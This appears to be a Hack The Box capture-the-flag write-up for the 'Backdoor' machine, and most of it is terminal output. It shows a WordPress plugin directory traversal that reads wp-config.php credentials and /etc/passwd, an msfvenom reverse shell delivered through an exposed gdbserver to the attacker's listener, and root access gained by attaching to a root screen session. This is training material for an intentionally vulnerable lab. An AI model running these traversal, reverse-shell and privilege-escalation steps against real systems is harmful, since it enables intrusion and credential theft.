Previous Page
Backdoor Writeup
Introduction :
Backdoor is an easy Linux box released back in November 2021.
Backdoor is an easy Linux box released back in November 2021.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ nmap -sCV backdoor.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 20:11 UTC
Nmap scan report for backdoor.htb (10.129.96.68)
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
Our nmap scan picked up port 80 so let's investigate it:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 20:12:34 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
Progress: 50259 / 220561 (22.79%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/20 20:13:26 Finished
===============================================================
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb/wp-content/
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 20:13:30 Starting gobuster in directory enumeration mode
===============================================================
/themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
/plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
/upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
Progress: 3928 / 220561 (1.78%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/20 20:13:33 Finished
===============================================================
So thanks to Gobuster we found the /wp-content/plugins/ebook-download/ subdirectory:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ searchsploit ebook plugin
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting | php/webapps/23355.txt
WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection | php/webapps/17773.txt
WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection | php/webapps/17737.txt
WordPress Plugin Facebook Survey 1.0 - SQL Injection | php/webapps/22853.txt
WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting | php/webapps/36383.txt
WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting | php/webapps/35439.txt
WordPress Plugin Spider Facebook - 'facebook.php' SQL Injection | php/webapps/39300.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ cat $(locate 39575.txt)
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================%
Apparently there is a Directory traversal vulnerability, so let's test it out:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ wget http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../wp-config.php -O wp-config.php
--2022-11-20 20:35:12-- http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
Resolving backdoor.htb (backdoor.htb)... 10.129.96.68
Connecting to backdoor.htb (backdoor.htb)|10.129.96.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3866 (3.8K) [application/octet-stream]
Saving to: ‘wp-config.php’
wp-config.php 100%[=========================================================================================================>] 3.78K --.-KB/s in 0.03s
2022-11-20 20:35:12 (126 KB/s) - ‘wp-config.php’ saved [3866/3866]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ cat wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
[...]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../../../../etc/passwd
../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
So here we have credentials: wordpressuser:MQYBJSaD#DxG6qbm and we also have the list of users with the passwd file.
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
→ for i in `seq 620 1000`; do curl --output - http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=/proc/$i/cmdline ; echo ; done
Let it run, and eventually you'll find the gdbserver process running on port 1337:
[ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
→ nmap -sCV backdoor.htb -p1337
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-30 09:41 CET
Nmap scan report for backdoor.htb (10.129.96.68)
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
1337/tcp open waste?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.13 seconds
So to exploit gdbserver, we follow this page on hacktricks:
[ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
→ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=8001 PrependFork=true -f elf -o rev.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: rev.elf
Then locally, we debug it:
[term1]
[ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
→ nc -lvnp 8001
listening on [any] 8001 ...
[term2]
[ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
→ gdb -q rev.elf
Reading symbols from rev.elf...
(No debugging symbols found in rev.elf)
(gdb) target extended-remote 10.129.96.68
10.129.96.68: No such file or directory.
(gdb) target extended-remote 10.129.96.68:1337
Remote debugging using 10.129.96.68:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /usr/lib/debug/.build-id/53/74b5558386b815e69cc1838a6052cc9b4746f3.debug from remote target...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put rev.elf /dev/shm/nihilist
Successfully sent file "rev.elf".
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /dev/shm/nihilist from remote target...
Reading /dev/shm/nihilist from remote target...
Reading symbols from target:/dev/shm/nihilist...
(No debugging symbols found in target:/dev/shm/nihilist)
Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
[Detaching after fork from child process 7213]
[Inferior 1 (process 7204) exited normally]
(gdb)
[term1]
[ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
→ nc -lvnp 8001
listening on [any] 8001 ...
connect to [10.10.14.37] from (UNKNOWN) [10.129.96.68] 49544
id
uid=1000(user) gid=1000(user) groups=1000(user)
And we got the reverse shell! Now let's upgrade it to a fully interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
user@Backdoor:/home/user$ ^Z
[1] + 216968 suspended nc -lvnp 8001
[ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
→ stty raw -echo ; fg
[1] + 216968 continued nc -lvnp 8001
export TERM=screen-256color
user@Backdoor:/home/user$ export SHELL=bash
user@Backdoor:/home/user$ stty rows 50 cols 200
user@Backdoor:/home/user$ reset
Now that we have a fully interactive reverse shell, let's print the user flag:
user@Backdoor:/home/user$ cat user.txt
3fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the user flag!
Now in order to enumerate privesc paths, we run linpeas.sh :
[term1]
[ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
→ ls
linpeas.sh
[ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term2]
user@Backdoor:/home/user$ wget http://10.10.14.37:9090/linpeas.sh -O /tmp/peas.sh
--2022-11-30 10:11:59-- http://10.10.14.37:9090/linpeas.sh
Connecting to 10.10.14.37:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: ‘/tmp/peas.sh’
/tmp/peas.sh 100%[===================>] 808.42K 266KB/s in 3.0s
2022-11-30 10:12:03 (266 KB/s) - ‘/tmp/peas.sh’ saved [827827/827827]
user@Backdoor:/home/user$ chmod +x /tmp/peas.sh
user@Backdoor:/home/user$ /tmp/peas.sh
Let it run, then in the output we see more info regarding gdbserver, but we can also see it with the ps command:
user@Backdoor:/home/user$ ps auxww | grep gdb
root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
user 31115 0.0 0.0 6632 732 pts/2 S+ 10:16 0:00 grep --color=auto gdb
user@Backdoor:/home/user$ ps auxww | grep true
root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
root 950 0.0 0.0 2608 1544 ? Ss 08:39 0:02 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
user 31338 0.0 0.0 6632 732 pts/2 S+ 10:17 0:00 grep --color=auto true
When looking at the processes, we see that there is also a script running screen as the root user, so let's enumerate it:
user@Backdoor:/home/user$ screen -ls
No Sockets found in /run/screen/S-user.
user@Backdoor:/home/user$ screen -ls root/
There is a suitable screen on:
995.root (11/30/22 08:39:42) (Multi, detached)
1 Socket in /run/screen/S-root.
Here we see the root user is running screen on the socket /root/screen/S-root, so we connect to it:
user@Backdoor:/home/user$ screen -x root/995
root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# cat root.txt
2dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Here we can see the progress graph :
